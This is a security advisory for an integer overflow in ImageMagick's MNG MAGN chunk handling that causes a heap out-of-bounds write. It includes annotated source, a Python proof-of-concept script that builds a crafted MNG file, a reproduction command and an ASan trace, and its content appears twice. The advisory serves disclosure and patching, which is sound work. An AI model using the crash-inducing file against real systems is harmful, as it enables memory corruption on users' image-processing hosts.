Headline
GHSA-qp29-wxp5-wh82: imagemagick: integer overflows in MNG magnification
Vulnerability Details
The magnified size calculations in ReadOneMNGIMage
(in coders/png.c
) are unsafe and can overflow, leading to memory corruption.
The source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured.
static Image *ReadOneMNGImage(MngReadInfo* mng_info,
const ImageInfo *image_info,ExceptionInfo *exception)
{
// Lots of stuff, this is effectively a state machine for the MNG rendering commands,
// skip to the point where we start processing the "MAGN" command.
if (memcmp(type,mng_MAGN,4) == 0)
{
png_uint_16
magn_first,
magn_last,
magn_mb,
magn_ml,
magn_mr,
magn_mt,
magn_mx,
magn_my,
magn_methx,
magn_methy;
// Details unimportant, but each of the `magn_xxx` variables is read from the file.
if (magn_first == 0 || magn_last == 0)
{
/* Save the magnification factors for object 0 */
mng_info->magn_mb=magn_mb;
mng_info->magn_ml=magn_ml;
mng_info->magn_mr=magn_mr;
mng_info->magn_mt=magn_mt;
mng_info->magn_mx=magn_mx;
mng_info->magn_my=magn_my;
mng_info->magn_methx=magn_methx;
mng_info->magn_methy=magn_methy;
}
}
// Details unimportant, we load the image to be scaled and store it in `image`
if (mng_type)
{
MngBox
crop_box;
if (((mng_info->magn_methx > 0) && (mng_info->magn_methx <= 5)) &&
((mng_info->magn_methy > 0) && (mng_info->magn_methy <= 5)))
{
png_uint_32
magnified_height,
magnified_width;
if (logging != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Processing MNG MAGN chunk");
if (image->columns == 1)
mng_info->magn_methx = 1;
if (image->rows == 1)
mng_info->magn_methy = 1;
if (mng_info->magn_methx == 1)
{
magnified_width=mng_info->magn_ml; // [0]
if (image->columns > 1)
magnified_width += mng_info->magn_mr; // [1]
if (image->columns > 2)
magnified_width += (png_uint_32)
((image->columns-2)*(mng_info->magn_mx)); // [2]
}
// Different cases handle available scaling kinds, all of which have similar issues...
// We now check whether the output image is larger than the input image in either
// dimension, and if so, we will allocate a new image buffer of size
// `magnified_width * magnified_height`.
if (magnified_height > image->rows ||
magnified_width > image->columns)
{
Image
*large_image;
// Snip...
large_image->columns=magnified_width;
large_image->rows=magnified_height;
magn_methx=mng_info->magn_methx;
magn_methy=mng_info->magn_methy;
// In between here, we allocate the pixel buffer for `large_image`.
/* magnify the rows into the right side of the large image */
if (logging != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Magnify the rows to %.20g",
(double) large_image->rows);
m=(ssize_t) mng_info->magn_mt;
yy=0;
length=(size_t) GetPixelChannels(image)*image->columns;
next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));
prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));
if ((prev == (Quantum *) NULL) ||
(next == (Quantum *) NULL))
{
if (prev != (Quantum *) NULL)
prev=(Quantum *) RelinquishMagickMemory(prev);
if (next != (Quantum *) NULL)
next=(Quantum *) RelinquishMagickMemory(next);
image=DestroyImageList(image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
n=GetAuthenticPixels(image,0,0,image->columns,1,exception);
(void) memcpy(next,n,length);
for (y=0; y < (ssize_t) image->rows; y++)
{
if (y == 0)
m=(ssize_t) mng_info->magn_mt;
else if (magn_methy > 1 && y == (ssize_t) image->rows-2)
m=(ssize_t) mng_info->magn_mb;
else if (magn_methy <= 1 && y == (ssize_t) image->rows-1)
m=(ssize_t) mng_info->magn_mb;
else if (magn_methy > 1 && y == (ssize_t) image->rows-1)
m=1;
else
m=(ssize_t) mng_info->magn_my;
n=prev;
prev=next;
next=n;
if (y < (ssize_t) image->rows-1)
{
n=GetAuthenticPixels(image,0,y+1,image->columns,1,
exception);
(void) memcpy(next,n,length);
}
for (i=0; i < m; i++, yy++)
{
Quantum
*pixels;
assert(yy < (ssize_t) large_image->rows);
pixels=prev;
n=next;
q=GetAuthenticPixels(large_image,0,yy,large_image->columns,
1,exception);
if (q == (Quantum *) NULL)
break;
q+=(ptrdiff_t) (large_image->columns-image->columns)*
GetPixelChannels(large_image); // [3]
If we look at the calculation for magnified_width
, we can see that we are storing the results in a png_uint32
. The operations at [0] and [1] are safe, since mng_info->magn_ml
and mng_info->magn_mx
are both 16-bit unsigned integers, but both the multiplication at [2] and the addition of the result of that multiplication to magnified_width
can overflow, leading to a value of magnified_width
that is smaller than required.
When we then operate on the pixel buffers, we use the original parameters for the magnification, and we assume (reasonably?) that the output buffer is larger than the input buffer when calculating where to write the upsampled/magnified pixel values. Unfortunately, after the overflow has happened, this assumption is no longer true, and the calculation at [3] will end up with a q
pointer outside the buffer bounds.
This issue leads to an out-of-bounds write of controlled data beyond the bounds of a heap allocation.
Triggering this issue requires an image
with large columns
or rows
(~65535) which should be prevented by all of the example security policies (which set width
/height
limits of 8KP
).
Affected Version(s)
Verified on current HEAD (305e383c8ac7b30bc2ee96ab8c43ec96217ec2a9) and latest stable release (7.1.2-0).
Build Instructions
git clone https://github.com/imagemagick/imagemagick
cd imagemagick
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address"
export CXXFLAGS="-fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared --disable-docs --with-jxl
make -j
Reproduction
Test Case
This testcase is a python script that will generate an MNG file with a MAGN chunk that triggers this overflow leading to an out-of-bounds heap write.
import struct
import zlib
def create_chunk(chunk_type, data):
crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
return struct.pack('>I', len(data)) + chunk_type + data + struct.pack('>I', crc)
# MNG signature
mng_signature = b'\x8aMNG\r\n\x1a\n'
# --- Dimensions ---
mhdr_width = 1
mhdr_height = 1
ihdr_width = 65538 # W: Original width to cause W' overflow
ihdr_height = 1 # H: Original height
# MHDR chunk (Valid small dimensions)
mhdr_data = struct.pack('>IIIIIII', mhdr_width, mhdr_height, 1, 0, 0, 0, 0)
mhdr_chunk = create_chunk(b'MHDR', mhdr_data)
# MAGN chunk: Trigger width overflow, force entry via height magn
magn_first = 0
magn_last = 0
magn_methx = 1
magn_mx = 65535 # -> magnified_width = 65534 (overflow)
magn_my = 2 # -> magnified_height = 2 (magn_mt=2)
magn_ml = 65535
magn_mr = 65535
magn_mt = 2 # Force magnified_height > H (necessary to trigger large_image path)
magn_mb = 1
magn_methy = 1
magn_data = struct.pack('>HHBHHHHHHB',
magn_first, magn_last,
magn_methx,
magn_mx, magn_my,
magn_ml, magn_mr,
magn_mt, magn_mb,
magn_methy)
magn_chunk = create_chunk(b'MAGN', magn_data)
# IHDR chunk
ihdr_data = struct.pack('>IIBBBBB', ihdr_width, ihdr_height, 8, 0, 0, 0, 0)
ihdr_chunk = create_chunk(b'IHDR', ihdr_data)
# IDAT chunk (Minimal data for W x H grayscale pixels)
scanline = b'\x00' + (b'\x00' * ihdr_width)
compressed_scanline = zlib.compress(scanline)
idat_chunk = create_chunk(b'IDAT', compressed_scanline)
# IEND chunk
iend_chunk = create_chunk(b'IEND', b'')
# MEND chunk
mend_chunk = create_chunk(b'MEND', b'')
program_input = (
mng_signature +
mhdr_chunk +
magn_chunk +
ihdr_chunk +
idat_chunk +
iend_chunk +
mend_chunk
)
print(f"Generated MNG size: {len(program_input)} bytes")
with open("magn_write.mng", "wb") as tmp:
tmp.write(program_input)
Command
python3 ./generate_testcase.py
utilities/magick ./magn_write.mng -resize 200x200 PNG:output.png
ASan Backtrace
=================================================================
==585863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f80849757d0 at pc 0x55744124fba3 bp 0x7fff1300ddf0 sp 0x7fff1300dde8
WRITE of size 4 at 0x7f80849757d0 thread T0
#0 0x55744124fba2 in SetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52
#1 0x55744123be16 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:27
#2 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
#3 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
#4 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
#5 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22
#6 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7
#7 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
#8 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
#9 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
#10 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
#11 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
#12 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#13 0x7f8087433d64 in __libc_start_main csu/../csu/libc-start.c:360:3
#14 0x557440d3f790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f2790) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)
0x7f80849757d0 is located 48 bytes before 1572816-byte region [0x7f8084975800,0x7f8084af57d0)
allocated by thread T0 here:
#0 0x557440de00cb in posix_memalign (/tmp/repro/imagemagick/utilities/magick+0x2930cb) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)
#1 0x557440e58aa6 in AcquireAlignedMemory_POSIX /tmp/repro/imagemagick/MagickCore/memory.c:300:7
#2 0x557440e5885d in AcquireAlignedMemory /tmp/repro/imagemagick/MagickCore/memory.c:378:10
#3 0x5574412e9725 in OpenPixelCache /tmp/repro/imagemagick/MagickCore/cache.c:3775:46
#4 0x5574412eead7 in GetImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:1782:18
#5 0x5574412ef71b in SyncImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:5600:28
#6 0x557440e2e786 in SetImageStorageClass /tmp/repro/imagemagick/MagickCore/image.c:2617:10
#7 0x557440e2f075 in SetImageBackgroundColor /tmp/repro/imagemagick/MagickCore/image.c:2422:7
#8 0x55744123b3d6 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6560:28
#9 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
#10 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
#11 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
#12 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22
#13 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7
#14 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
#15 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
#16 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
#17 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
#18 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
#19 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 in SetPixelRed
Shadow bytes around the buggy address:
0x7f8084975500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x7f8084975780: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa
0x7f8084975800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==585863==ABORTING
Reporter Credit
Google Big Sleep
****Vulnerability Details****
The magnified size calculations in ReadOneMNGIMage (in coders/png.c) are unsafe and can overflow, leading to memory corruption.
The source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured.
static Image *ReadOneMNGImage(MngReadInfo* mng_info, const ImageInfo *image_info,ExceptionInfo *exception) {
// Lots of stuff, this is effectively a state machine for the MNG rendering commands, // skip to the point where we start processing the “MAGN” command.
if (memcmp(type,mng\_MAGN,4) \== 0)
{
png\_uint\_16
magn\_first,
magn\_last,
magn\_mb,
magn\_ml,
magn\_mr,
magn\_mt,
magn\_mx,
magn\_my,
magn\_methx,
magn\_methy;
// Details unimportant, but each of the `magn_xxx` variables is read from the file.
if (magn\_first \== 0 || magn\_last \== 0)
{
/\* Save the magnification factors for object 0 \*/
mng\_info\->magn\_mb\=magn\_mb;
mng\_info\->magn\_ml\=magn\_ml;
mng\_info\->magn\_mr\=magn\_mr;
mng\_info\->magn\_mt\=magn\_mt;
mng\_info\->magn\_mx\=magn\_mx;
mng\_info\->magn\_my\=magn\_my;
mng\_info\->magn\_methx\=magn\_methx;
mng\_info\->magn\_methy\=magn\_methy;
}
}
// Details unimportant, we load the image to be scaled and store it in `image`
if (mng\_type)
{
MngBox
crop\_box;
if (((mng\_info\->magn\_methx \> 0) && (mng\_info\->magn\_methx <= 5)) &&
((mng\_info\->magn\_methy \> 0) && (mng\_info\->magn\_methy <= 5)))
{
png\_uint\_32
magnified\_height,
magnified\_width;
if (logging != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Processing MNG MAGN chunk");
if (image\->columns \== 1)
mng\_info\->magn\_methx \= 1;
if (image\->rows \== 1)
mng\_info\->magn\_methy \= 1;
if (mng\_info\->magn\_methx \== 1)
{
magnified\_width\=mng\_info\->magn\_ml; // \[0\]
if (image\->columns \> 1)
magnified\_width += mng\_info\->magn\_mr; // \[1\]
if (image\->columns \> 2)
magnified\_width += (png\_uint\_32)
((image\->columns\-2)\*(mng\_info\->magn\_mx)); // \[2\]
}
// Different cases handle available scaling kinds, all of which have similar issues…
// We now check whether the output image is larger than the input image in either // dimension, and if so, we will allocate a new image buffer of size // `magnified_width * magnified_height`.
if (magnified\_height \> image\->rows ||
magnified\_width \> image\->columns)
{
Image
\*large\_image;
// Snip…
large\_image\->columns\=magnified\_width;
large\_image\->rows\=magnified\_height;
magn\_methx\=mng\_info\->magn\_methx;
magn\_methy\=mng\_info\->magn\_methy;
// In between here, we allocate the pixel buffer for `large_image`.
/\* magnify the rows into the right side of the large image \*/
if (logging != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Magnify the rows to %.20g",
(double) large\_image\->rows);
m\=(ssize\_t) mng\_info\->magn\_mt;
yy\=0;
length\=(size\_t) GetPixelChannels(image)\*image\->columns;
next\=(Quantum \*) AcquireQuantumMemory(length,sizeof(\*next));
prev\=(Quantum \*) AcquireQuantumMemory(length,sizeof(\*prev));
if ((prev \== (Quantum \*) NULL) ||
(next \== (Quantum \*) NULL))
{
if (prev != (Quantum \*) NULL)
prev\=(Quantum \*) RelinquishMagickMemory(prev);
if (next != (Quantum \*) NULL)
next\=(Quantum \*) RelinquishMagickMemory(next);
image\=DestroyImageList(image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
n\=GetAuthenticPixels(image,0,0,image\->columns,1,exception);
(void) memcpy(next,n,length);
for (y\=0; y < (ssize\_t) image\->rows; y++)
{
if (y \== 0)
m\=(ssize\_t) mng\_info\->magn\_mt;
else if (magn\_methy \> 1 && y \== (ssize\_t) image\->rows\-2)
m\=(ssize\_t) mng\_info\->magn\_mb;
else if (magn\_methy <= 1 && y \== (ssize\_t) image\->rows\-1)
m\=(ssize\_t) mng\_info\->magn\_mb;
else if (magn\_methy \> 1 && y \== (ssize\_t) image\->rows\-1)
m\=1;
else
m\=(ssize\_t) mng\_info\->magn\_my;
n\=prev;
prev\=next;
next\=n;
if (y < (ssize\_t) image\->rows\-1)
{
n\=GetAuthenticPixels(image,0,y+1,image\->columns,1,
exception);
(void) memcpy(next,n,length);
}
for (i\=0; i < m; i++, yy++)
{
Quantum
\*pixels;
assert(yy < (ssize\_t) large\_image\->rows);
pixels\=prev;
n\=next;
q\=GetAuthenticPixels(large\_image,0,yy,large\_image\->columns,
1,exception);
if (q \== (Quantum \*) NULL)
break;
q+=(ptrdiff\_t) (large\_image\->columns\-image\->columns)\*
GetPixelChannels(large\_image); // \[3\]
If we look at the calculation for magnified_width, we can see that we are storing the results in a png_uint32. The operations at [0] and [1] are safe, since mng_info->magn_ml and mng_info->magn_mx are both 16-bit unsigned integers, but both the multiplication at [2] and the addition of the result of that multiplication to magnified_width can overflow, leading to a value of magnified_width that is smaller than required.
When we then operate on the pixel buffers, we use the original parameters for the magnification, and we assume (reasonably?) that the output buffer is larger than the input buffer when calculating where to write the upsampled/magnified pixel values. Unfortunately, after the overflow has happened, this assumption is no longer true, and the calculation at [3] will end up with a q pointer outside the buffer bounds.
This issue leads to an out-of-bounds write of controlled data beyond the bounds of a heap allocation.
Triggering this issue requires an image with large columns or rows (~65535) which should be prevented by all of the example security policies (which set width/height limits of 8KP).
****Affected Version(s)****
Verified on current HEAD (305e383c8ac7b30bc2ee96ab8c43ec96217ec2a9) and latest stable release (7.1.2-0).
****Build Instructions****
git clone https://github.com/imagemagick/imagemagick cd imagemagick
export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address" export CXXFLAGS="-fsanitize=address" export LDFLAGS="-fsanitize=address"
./configure --disable-shared --disable-docs --with-jxl make -j
****Reproduction********Test Case****
This testcase is a python script that will generate an MNG file with a MAGN chunk that triggers this overflow leading to an out-of-bounds heap write.
import struct
import zlib
def create_chunk(chunk_type, data):
crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
return struct.pack('>I', len(data)) + chunk_type + data + struct.pack('>I', crc)
# MNG signature
mng_signature = b'\x8aMNG\r\n\x1a\n'
# --- Dimensions ---
mhdr_width = 1
mhdr_height = 1
ihdr_width = 65538 # W: Original width to cause W' overflow
ihdr_height = 1 # H: Original height
# MHDR chunk (Valid small dimensions)
mhdr_data = struct.pack('>IIIIIII', mhdr_width, mhdr_height, 1, 0, 0, 0, 0)
mhdr_chunk = create_chunk(b'MHDR', mhdr_data)
# MAGN chunk: Trigger width overflow, force entry via height magn
magn_first = 0
magn_last = 0
magn_methx = 1
magn_mx = 65535 # -> magnified_width = 65534 (overflow)
magn_my = 2 # -> magnified_height = 2 (magn_mt=2)
magn_ml = 65535
magn_mr = 65535
magn_mt = 2 # Force magnified_height > H (necessary to trigger large_image path)
magn_mb = 1
magn_methy = 1
magn_data = struct.pack('>HHBHHHHHHB',
magn_first, magn_last,
magn_methx,
magn_mx, magn_my,
magn_ml, magn_mr,
magn_mt, magn_mb,
magn_methy)
magn_chunk = create_chunk(b'MAGN', magn_data)
# IHDR chunk
ihdr_data = struct.pack('>IIBBBBB', ihdr_width, ihdr_height, 8, 0, 0, 0, 0)
ihdr_chunk = create_chunk(b'IHDR', ihdr_data)
# IDAT chunk (Minimal data for W x H grayscale pixels)
scanline = b'\x00' + (b'\x00' * ihdr_width)
compressed_scanline = zlib.compress(scanline)
idat_chunk = create_chunk(b'IDAT', compressed_scanline)
# IEND chunk
iend_chunk = create_chunk(b'IEND', b'')
# MEND chunk
mend_chunk = create_chunk(b'MEND', b'')
program_input = (
mng_signature +
mhdr_chunk +
magn_chunk +
ihdr_chunk +
idat_chunk +
iend_chunk +
mend_chunk
)
print(f"Generated MNG size: {len(program_input)} bytes")
with open("magn_write.mng", "wb") as tmp:
tmp.write(program_input)
****Command****
python3 ./generate_testcase.py utilities/magick ./magn_write.mng -resize 200x200 PNG:output.png
****ASan Backtrace****
=================================================================
==585863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f80849757d0 at pc 0x55744124fba3 bp 0x7fff1300ddf0 sp 0x7fff1300dde8
WRITE of size 4 at 0x7f80849757d0 thread T0
#0 0x55744124fba2 in SetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52
#1 0x55744123be16 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:27
#2 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
#3 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
#4 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
#5 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22
#6 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7
#7 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
#8 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
#9 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
#10 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
#11 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
#12 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#13 0x7f8087433d64 in __libc_start_main csu/../csu/libc-start.c:360:3
#14 0x557440d3f790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f2790) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)
0x7f80849757d0 is located 48 bytes before 1572816-byte region [0x7f8084975800,0x7f8084af57d0)
allocated by thread T0 here:
#0 0x557440de00cb in posix_memalign (/tmp/repro/imagemagick/utilities/magick+0x2930cb) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)
#1 0x557440e58aa6 in AcquireAlignedMemory_POSIX /tmp/repro/imagemagick/MagickCore/memory.c:300:7
#2 0x557440e5885d in AcquireAlignedMemory /tmp/repro/imagemagick/MagickCore/memory.c:378:10
#3 0x5574412e9725 in OpenPixelCache /tmp/repro/imagemagick/MagickCore/cache.c:3775:46
#4 0x5574412eead7 in GetImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:1782:18
#5 0x5574412ef71b in SyncImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:5600:28
#6 0x557440e2e786 in SetImageStorageClass /tmp/repro/imagemagick/MagickCore/image.c:2617:10
#7 0x557440e2f075 in SetImageBackgroundColor /tmp/repro/imagemagick/MagickCore/image.c:2422:7
#8 0x55744123b3d6 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6560:28
#9 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
#10 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
#11 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
#12 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22
#13 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7
#14 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
#15 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
#16 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
#17 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
#18 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
#19 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 in SetPixelRed
Shadow bytes around the buggy address:
0x7f8084975500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x7f8084975780: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa
0x7f8084975800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==585863==ABORTING
****Reporter Credit****
Google Big Sleep
References
- GHSA-qp29-wxp5-wh82
- https://nvd.nist.gov/vuln/detail/CVE-2025-55154
- https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0
- https://goo.gle/bigsleep